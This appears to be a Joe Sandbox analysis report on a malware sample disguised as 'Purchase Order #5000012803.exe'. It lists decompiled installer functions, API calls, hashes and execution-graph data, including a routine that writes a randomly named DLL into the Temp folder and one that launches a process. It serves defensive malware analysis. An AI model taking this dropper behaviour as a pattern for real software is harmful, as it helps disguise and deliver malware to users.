                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Timeout
                      • String ID: !
                      • API String ID: 1777923405-2657877971
                      • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                      • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                      0x004052ee
                      0x0040530a
                      0x00405312
                      0x00405317
                      0x00000000
                      0x0040531d
                      0x00405321

                      APIs
                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                      • CloseHandle.KERNEL32(?), ref: 00405317
                      Strings
                      • Error launching installer, xrefs: 004052F8
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CloseCreateHandleProcess
                      • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                      • API String ID: 3712363035-1785902839
                      • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                      • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                      0x00405579
                      0x00405590
                      0x00405598
                      0x00405598
                      0x004055a0

                      APIs
                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                      • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharPrevlstrcatlstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\
                      • API String ID: 2659869361-3081826266
                      • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                      • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                      0x00401ec7
                      0x00401ecf
                      0x00401ed4
                      0x00401ed9
                      0x00401edd
                      0x00401ee0
                      0x00401ee2
                      0x00401ee9
                      0x00401ef2
                      0x00401efa
                      0x00401efd
                      0x00401f12
                      0x00401f18
                      0x00401f2b
                      0x00401f34
                      0x00401f40
                      0x00401f45
                      0x00401f45
                      0x00401f2b
                      0x00401f48
                      0x00401b75
                      0x00401b75
                      0x00401efd
                      0x00402880
                      0x0040288c

                      APIs
                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                      • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                      • String ID:
                      • API String ID: 1404258612-0
                      • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                      • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                      Download Yara Rule
                      C-Code - Quality: 67%
                      			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                      0x00401d29
                      0x00401d42
                      0x00401d4c
                      0x00401d51
                      0x00401d5c
                      0x00401d63
                      0x00401d75
                      0x00401d7b
                      0x00401d80
                      0x00401d8a
                      0x004024aa
                      0x00401561
                      0x00402825
                      0x00402880
                      0x0040288c

                      APIs
                      • GetDC.USER32(?), ref: 00401D22
                      • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                      • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CapsCreateDeviceFontIndirect
                      • String ID:
                      • API String ID: 3272661963-0
                      • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                      • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                      • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                      • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403897, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                      0x0040389b
                      0x004038a0
                      0x004038a6
                      0x004038ab
                      0x004038ab
                      0x004038b3
                      0x00000000
                      0x00000000
                      0x004038bb
                      0x004038c3
                      0x004038c5
                      0x004038cb
                      0x004038cb
                      0x004038cd
                      0x004038d9
                      0x00000000
                      0x00000000
                      0x004038dd
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004038df
                      0x004038e4
                      0x004038ed
                      0x004038f3
                      0x004038f8
                      0x0040390c
                      0x00403917
                      0x0040392f
                      0x00403935
                      0x0040393a
                      0x00403942
                      0x00403963
                      0x00403963
                      0x00403963
                      0x00403944
                      0x00403946
                      0x00403946
                      0x0040394a
                      0x00403951
                      0x00403951
                      0x00403956
                      0x0040395c
                      0x0040395c
                      0x00000000
                      0x00403946
                      0x004038fa
                      0x004038ff
                      0x00403908
                      0x00403901
                      0x00403901
                      0x00403901
                      0x004038ff

                      APIs
                      • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: TextWindow
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 530164218-517883005
                      • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                      • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                      • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                      • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}




                      0x00404d7f
                      0x00404da4
                      0x00404dc4
                      0x00404dc7
                      0x00404dca
                      0x00404de1
                      0x00404de7
                      0x00404dee
                      0x00404df5
                      0x00404dfc
                      0x00404e01
                      0x00404e07
                      0x00000000
                      0x00404e17
                      0x00404db1
                      0x00404e04
                      0x00404e04
                      0x00000000
                      0x00404e04
                      0x00404dbd
                      0x00404dbf
                      0x00000000
                      0x00404dbf
                      0x00404d85
                      0x00000000
                      0x00000000
                      0x00404d8c
                      0x00000000

                      APIs
                      • IsWindowVisible.USER32(?), ref: 00404DA9
                      • CallWindowProcA.USER32 ref: 00404E17
                        • Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Window$CallMessageProcSendVisible
                      • String ID:
                      • API String ID: 3748168415-3916222277
                      • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                      • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                      • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                      • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                      0x004024b0
                      0x004024b0
                      0x004024b3
                      0x004024ce
                      0x004024b5
                      0x004024b7
                      0x004024bc
                      0x004024c3
                      0x004024d5
                      0x0040264e
                      0x0040264e
                      0x004024db
                      0x004024ed
                      0x004015a6
                      0x004015a8
                      0x00000000
                      0x004015ae
                      0x004015a8
                      0x00402880
                      0x0040288c

                      APIs
                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                      Strings
                      • C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll, xrefs: 004024BC, 004024E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileWritelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll
                      • API String ID: 427699356-110904723
                      • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                      • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                      • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                      • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                      0x004055c0
                      0x004055ca
                      0x004055cc
                      0x004055d3
                      0x004055db
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004055db
                      0x004055dd
                      0x004055e2

                      APIs
                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order #5000012803.exe,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 004055C5
                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order #5000012803.exe,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 004055D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharPrevlstrlen
                      • String ID: C:\Users\user\Desktop
                      • API String ID: 2709904686-224404859
                      • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                      • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                      • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                      • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                      0x004056dd
                      0x004056df
                      0x00405707
                      0x004056ec
                      0x004056f1
                      0x004056fc
                      0x00000000
                      0x00405719
                      0x00405705
                      0x00405705
                      0x00000000

                      APIs
                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                      • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                      • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: lstrlen$CharNextlstrcmpi
                      • String ID:
                      • API String ID: 190613189-0
                      • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                      • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                      • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                      • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Analysis Process: Purchase Order #5000012803.exe PID: 7000 Parent PID: 6940 Purchase Order #5000012803.exeCOMMON

                      Execution Graph

                      Execution Coverage:31.2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:2.3%
                      Total number of Nodes:1846
                      Total number of Limit Nodes:92

                      Graph

                      execution_graph 9702 40c640 9729 404bee 9702->9729 9705 40c70f 9706 404bee 6 API calls 9707 40c66b 9706->9707 9708 404bee 6 API calls 9707->9708 9713 40c708 9707->9713 9710 40c683 9708->9710 9709 402bab 2 API calls 9709->9705 9711 404bee 6 API calls 9710->9711 9717 40c701 9710->9717 9716 40c694 9711->9716 9712 402bab 2 API calls 9712->9713 9713->9709 9714 40c6f8 9715 402bab 2 API calls 9714->9715 9715->9717 9716->9714 9736 40c522 9716->9736 9717->9712 9719 40c6a9 9720 40c6ef 9719->9720 9722 405872 4 API calls 9719->9722 9721 402bab 2 API calls 9720->9721 9721->9714 9723 40c6c5 9722->9723 9724 405872 4 API calls 9723->9724 9725 40c6d5 9724->9725 9726 405872 4 API calls 9725->9726 9727 40c6e7 9726->9727 9728 402bab 2 API calls 9727->9728 9728->9720 9730 402b7c 2 API calls 9729->9730 9731 404bff 9730->9731 9732 4031e5 4 API calls 9731->9732 9735 404c3b 9731->9735 9733 404c28 9732->9733 9734 402bab 2 API calls 9733->9734 9733->9735 9734->9735 9735->9705 9735->9706 9737 402b7c 2 API calls 9736->9737 9738 40c542 9737->9738 9738->9719 9739 405941 9740 4031e5 4 API calls 9739->9740 9741 405954 9740->9741 8306 409046 8319 413b28 8306->8319 8308 40906d 8310 405b6f 6 API calls 8308->8310 8309 40904e 8309->8308 8311 403fbf 7 API calls 8309->8311 8312 40907c 